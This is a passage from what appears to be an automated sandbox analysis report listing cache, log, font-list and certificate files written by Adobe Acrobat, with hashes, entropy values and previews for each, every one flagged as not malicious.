Malicious:	false
Preview:	2025/01/11-22:19:05.878 16a8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/11-22:19:05.880 16a8 Recovering log #3.2025/01/11-22:19:05.881 16a8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.105317367437716
Encrypted:	false
SSDEEP:	6:iO3oN+q2Pwkn2nKuAl9Ombzo2jMGIFUtN9BmZmwj9BiVkwOwkn2nKuAl9Ombzo23:7E+vYfHAa8uFUtfBm/xBiV5JfHAa8RJ
MD5:	6799CFFD7826202820364E119DA5790C
SHA1:	2D5A351CB0100E6EA76331728B3E14B4A38EA01C
SHA-256:	531377509B5178F3AFBCFBE723894C551F004E534624A7C8E263C6C0B76A6A65
SHA-512:	B34332B061EA84F5A7FC9860B6A0ACF8DD91F016CC6229D5D702CC6D281BDE04FE1D93F29DA44034297F3C422BDDE0024060DB4F3F98904E25270C36CA44B57D
Malicious:	false
Preview:	2025/01/11-22:19:05.910 2dc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/11-22:19:05.912 2dc Recovering log #3.2025/01/11-22:19:05.912 2dc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.105317367437716
Encrypted:	false
SSDEEP:	6:iO3oN+q2Pwkn2nKuAl9Ombzo2jMGIFUtN9BmZmwj9BiVkwOwkn2nKuAl9Ombzo23:7E+vYfHAa8uFUtfBm/xBiV5JfHAa8RJ
MD5:	6799CFFD7826202820364E119DA5790C
SHA1:	2D5A351CB0100E6EA76331728B3E14B4A38EA01C
SHA-256:	531377509B5178F3AFBCFBE723894C551F004E534624A7C8E263C6C0B76A6A65
SHA-512:	B34332B061EA84F5A7FC9860B6A0ACF8DD91F016CC6229D5D702CC6D281BDE04FE1D93F29DA44034297F3C422BDDE0024060DB4F3F98904E25270C36CA44B57D
Malicious:	false
Preview:	2025/01/11-22:19:05.910 2dc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/11-22:19:05.912 2dc Recovering log #3.2025/01/11-22:19:05.912 2dc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.958684469570158
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqdsBdOg2H7xcaq3QYiubInP7E4T3y:Y2sRdsvdMH03QYhbG7nby
MD5:	8CDF71B572605B0B3D80FC69034C1DCD
SHA1:	65083F8F8FFDAB8032BEEFF54AF93D085DD3057A
SHA-256:	BA16FD650A87B04FEC4C378EDBD7C812ACA3254DC1F5F5D01146A7CEBC36482F
SHA-512:	ACD2BF0C0FEFFFDC9AB8F7FC2CBD4D530BDEE16F3873836D89E2ED4CFEA6E962B35819FE10D498F591EB186077426B874771936C82B71A9D38937E65E3D2786A
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381211958502932","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":125638},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\b0f784d7-4dee-497e-8bcf-7cd9ad6e3fd7.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.958684469570158
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqdsBdOg2H7xcaq3QYiubInP7E4T3y:Y2sRdsvdMH03QYhbG7nby
MD5:	8CDF71B572605B0B3D80FC69034C1DCD
SHA1:	65083F8F8FFDAB8032BEEFF54AF93D085DD3057A
SHA-256:	BA16FD650A87B04FEC4C378EDBD7C812ACA3254DC1F5F5D01146A7CEBC36482F
SHA-512:	ACD2BF0C0FEFFFDC9AB8F7FC2CBD4D530BDEE16F3873836D89E2ED4CFEA6E962B35819FE10D498F591EB186077426B874771936C82B71A9D38937E65E3D2786A
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381211958502932","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":125638},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4320
Entropy (8bit):	5.248613790554159
Encrypted:	false
SSDEEP:	96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo787bad:etJCV4FiN/jTN/2r8Mta02fEhgO73go/
MD5:	1191D567EDFD628AC7A8F6D13E05D899
SHA1:	6A8E8604B8930EDA2E5F3A42449CC9E49651107E
SHA-256:	790868BAF7398DF3953F76433D7EF7271CE35FC23A453A66D7085AD585C14EC4
SHA-512:	1CE8312B5284B4690858940D772D3E787B9E1AFD448F092886096F9FCC658F0C25543FA87AEEA975B476134E006BFA34A978F66567AFD38101572EB43C07CDE6
Malicious:	false
Preview:	*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..\|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.165062212656797
Encrypted:	false
SSDEEP:	6:iOOhwFRi+q2Pwkn2nKuAl9OmbzNMxIFUtIhOZZmwKhONVkwOwkn2nKuAl9OmbzNq:7cws+vYfHAa8jFUtyOZ/AONV5JfHAa8E
MD5:	D01327F8467EC0F62ECF4888223040AD
SHA1:	03EC2455C3391E78BCF1FDB02DF05E66E545DBBE
SHA-256:	6C9ABB62BC949164D4B271C29311F676762AA05D15237A4FDFD0458A4E1F2ADE
SHA-512:	72063E5085778715E541195953368DA0D52A04DEFAA7F8FD46342F749FA083B4C3AEA8449BBDD74E60175CD904F28283F4310B60810C99DDA6555A2A6DCB78CA
Malicious:	false
Preview:	2025/01/11-22:19:06.043 2dc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/11-22:19:06.044 2dc Recovering log #3.2025/01/11-22:19:06.044 2dc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.165062212656797
Encrypted:	false
SSDEEP:	6:iOOhwFRi+q2Pwkn2nKuAl9OmbzNMxIFUtIhOZZmwKhONVkwOwkn2nKuAl9OmbzNq:7cws+vYfHAa8jFUtyOZ/AONV5JfHAa8E
MD5:	D01327F8467EC0F62ECF4888223040AD
SHA1:	03EC2455C3391E78BCF1FDB02DF05E66E545DBBE
SHA-256:	6C9ABB62BC949164D4B271C29311F676762AA05D15237A4FDFD0458A4E1F2ADE
SHA-512:	72063E5085778715E541195953368DA0D52A04DEFAA7F8FD46342F749FA083B4C3AEA8449BBDD74E60175CD904F28283F4310B60810C99DDA6555A2A6DCB78CA
Malicious:	false
Preview:	2025/01/11-22:19:06.043 2dc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/11-22:19:06.044 2dc Recovering log #3.2025/01/11-22:19:06.044 2dc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250112031910Z-183.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
Category:	dropped
Size (bytes):	71190
Entropy (8bit):	0.8418671210517596
Encrypted:	false
SSDEEP:	192:sUN7PgaFJ8+qGHJMojKfSABQs9CYVM6ZqJ:lN7PgaFJRpM9SQ9ZO6S
MD5:	933F69148EC45D9BE56D7063450F1E63
SHA1:	DEB748BA75E554DF6DA9A1D89845A4B2F06F7ED5
SHA-256:	6F21ED09C2F9482741E3496F85B3505F4732EF58E202AAC13D0C43AED9175074
SHA-512:	13961034EF9C7B9BAFBAA607D40B1CFD1B2D260514D480F16929CEC866432C1998BB426DF4A4E3784FCCD958817C7BF727BDC36A3927C40D1F3140FDDD170809
Malicious:	false
Preview:	BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.444867352071018
Encrypted:	false
SSDEEP:	384:SeJci5tfiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:NUs3OazzU89UTTgUL
MD5:	E9BA3A8ED709E4FD16004BCE69BF4488
SHA1:	C9E309198C54BD44BC6BB7CAAE764AB423E3FEDA
SHA-256:	5486FF4B3D4086D2A498C0A76303303C414C01BF037C1C3153E70079D3038A10
SHA-512:	AB24475FCB04C1A6E64AC5C48B7D08E87F003386C4AFD7AD65934E2B180D2053C3F0092F141A5303DDBB2DAE913E524A8EDE3A94CA52CE9E9E33917FDF2895CA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	2.212868799673982
Encrypted:	false
SSDEEP:	48:7MoIMnCkqvmFTIF3XmHjBoGGR+jMz+Lh4:7LIMnJ79IVXEBodRBkO
MD5:	306158355F9E3391CB8E03C8D5690D9C
SHA1:	1A8A54259547E1DC1020BB5AE9AF1348665E3D76
SHA-256:	FA154D636B73332DAB4A690A56391ABBCE2D9FC995643FB4D6BCEF5AC9C27BFB
SHA-512:	AF18D5AB127E0051251DA4283ACC59BB3D94908C300D093BF9D104A90112CC9BD2B6995DF9BA1E4814C04DCB12AD65E688E74A5761EC5411D7C35C3098A2BEE7
Malicious:	false
Preview:	.... .c.....X[n.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.7425532007658724
Encrypted:	false
SSDEEP:	3:kkFkl+N/tfllXlE/HT8k4Sh/ltNNX8RolJuRdxLlGB9lQRYwpDdt:kKnN/eT8gJdNMa8RdWBwRd
MD5:	09B3142327D9E1960EED2E3EE014EEBD
SHA1:	EA5840AE7C6C6FD46385EB3BEE3828A3470DB332
SHA-256:	09CB84AB25A56DC492DB48C6386736EC25E9DB1DFF8B576D9163EEEB721E20E6
SHA-512:	2C21EC77B749C5CAA15DA868F746825238A60BE33A246F5EA9477BA169D1748A5315A9DA41FC616A2B371D09F83CBFDBC1B2332F8277331097A9B2C349354131
Malicious:	false
Preview:	p...... ..........o.d..(....................................................... ..........W.....C..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.1231175727976703
Encrypted:	false
SSDEEP:	6:kKMFxL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:kF4DnLNkPlE99SNxAhUe/3
MD5:	C11232B53D0F81AB322F97DA008A4793
SHA1:	1910A6C0B3318B43FE84A69693E146BEA3E6CF26
SHA-256:	1A1F27D9A6A9EBF88E32BB3E8F8EA789484F0CD427C0DA927248037D1B9E4A44
SHA-512:	9107A3793A703081BB6B7F8E2515006C71314748E30E63996B542DD9C9664DAE9EC20DBA6C8BF01411A1E81AA34623E9F1451995D5D5FF3A8C1A70700641B236
Malicious:	false
Preview:	p...... ............d..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7876

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7876

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
